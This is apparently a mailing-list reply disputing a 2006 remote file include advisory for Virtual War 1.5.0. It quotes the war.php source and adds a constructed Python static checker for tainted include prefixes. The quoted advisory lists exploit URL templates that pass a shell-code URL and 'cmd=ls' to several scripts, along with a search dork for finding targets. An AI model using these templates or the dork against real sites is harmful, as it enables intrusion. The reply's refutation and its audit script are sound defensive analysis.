How should that be exploitable? $vwar_root is initialised with "./" in the first line of code after the comment.

*snip*

<?php
/* ############################################################################
 *
 * $Id: war.php,v 1.191 2004/09/09 15:52:33 rob Exp $
 *
 * This notice must remain untouched at all times.
 *
 * Modifications to the script, except the official addons or hacks,
 * without the owners permission are prohibited.
 * All rights reserved to their proper authors.
 *
 * ---------------------------------------------
 * http://www.vwar.de || Copyright (C) 2001-2004
 * ---------------------------------------------
 *
 * ############################################################################
 */

// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");

-----Original Message-----
From: AG Spider [mailto:ag-spider@xxxxxxxxxxx]
Sent: Monday, 7 August 2006 16:45
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Virtual War v1.5.0 Remote File Include (vwar_root)

Title : Virtual War v1.5.0 Remote File Include (vwar_root)
############################################
Discovered By :::: :::: :::: AG-Spider :::: :::: ::::
-----------------------------------------------------------------------------
Class : Remote file include
Risk : Danger
Application : Virtual War v1.5.0
URL : www.vwar.de
-----------------------------------------------------------------------------
dork : Powered by: Virtual War v1.5.0

Exploit :
http://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/news.php?vwar_root=[Shell-code]?&cmd=ls
http://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
----------------------------------------------------------------------------
The Arab Warriors Security Team - - -[T-A-W-S-T] - - - Muslims Hackers
greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE]
contact us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net
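The disagreement in this thread turns on one question: does the script assign $vwar_root from a string literal before the first require that uses it? With register_globals=On a request parameter ?vwar_root=... pre-populates the variable, so an unconditional literal assignment before the include discards the attacker's value, while an include that runs before any assignment (or after an assignment from $_GET/$_REQUEST) is a remote file include candidate. The Python script below is an added example, not code from either message or from the vWar project. It is a heuristic static check that strips PHP comments, finds include/require statements whose path begins with a variable, and classifies the last assignment to that variable before its first use as "literal", "tainted" (request superglobal), "unknown" (some other expression), or "unassigned". The three PHP inputs are constructed: WAR_PHP reproduces the war.php prologue quoted in the reply; UNASSIGNED_PHP and TAINTED_PHP are hypothetical variants written for this example and are not real vWar files.

```python
import re

# Constructed sample: the war.php prologue quoted in the reply above.
WAR_PHP = r'''<?php
/* ######################################################
 * $Id: war.php,v 1.191 2004/09/09 15:52:33 rob Exp $
 * http://www.vwar.de || Copyright (C) 2001-2004
 * ###################################################### */
// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");
'''

# Constructed, hypothetical: the include runs before any assignment, so
# with register_globals=On the request parameter supplies the prefix.
UNASSIGNED_PHP = r'''<?php
require ($vwar_root . "includes/functions_common.php");
$vwar_root = "./";
'''

# Constructed, hypothetical: the prefix is taken from the request explicitly.
TAINTED_PHP = r'''<?php
$vwar_root = $_GET['vwar_root'];
require_once($vwar_root . "includes/functions_common.php");
'''

# include/require followed by a variable as the first path component.
INCLUDE_RE = re.compile(
    r'\b(require|include|require_once|include_once)\b\s*\(?\s*\$(\w+)')
SUPERGLOBAL_RE = re.compile(r'^\$_(GET|POST|REQUEST|COOKIE)\b')


def strip_comments(src: str) -> str:
    """Drop /* */ block comments and // or # line comments.

    Heuristic: it does not understand string literals, so a '#' or '//'
    inside a string would also be cut. Good enough for triage, not parsing.
    """
    src = re.sub(r'/\*.*?\*/', '', src, flags=re.S)
    return re.sub(r'(//|#).*', '', src)


def classify_rhs(rhs: str) -> str:
    """Classify the right-hand side of an assignment."""
    rhs = rhs.strip()
    if re.fullmatch(r'(["\']).*\1', rhs, flags=re.S):
        return "literal"          # constant string, attacker cannot influence it
    if SUPERGLOBAL_RE.match(rhs):
        return "tainted"          # copied straight from the request
    return "unknown"              # some other expression, needs manual review


def audit_include_prefixes(src: str) -> dict[str, str]:
    """Return {variable: verdict} for every variable used as an include prefix.

    The verdict describes the LAST assignment to the variable that appears
    before its FIRST use in an include; "unassigned" means no assignment
    precedes that use, which is the register_globals RFI pattern.
    """
    code = strip_comments(src)
    verdicts: dict[str, str] = {}
    for m in INCLUDE_RE.finditer(code):
        var = m.group(2)
        if var in verdicts:
            continue
        assign_re = re.compile(r'\$' + re.escape(var) + r'\b\s*=(?!=)\s*([^;]+);')
        assignments = list(assign_re.finditer(code, 0, m.start()))
        if assignments:
            verdicts[var] = classify_rhs(assignments[-1].group(1))
        else:
            verdicts[var] = "unassigned"
    return verdicts


if __name__ == "__main__":
    for name, src in (("war.php (quoted)", WAR_PHP),
                      ("unassigned variant", UNASSIGNED_PHP),
                      ("tainted variant", TAINTED_PHP)):
        print(name, audit_include_prefixes(src))
```

Run against the quoted prologue the check reports vwar_root as "literal", which is the point the reply makes: the hardcoded "./" is assigned before either require, so a register_globals override of $vwar_root is overwritten before it is used. The check covers only the file it is given; whether other scripts or included files in the application assign the variable the same way is a separate question the page does not answer.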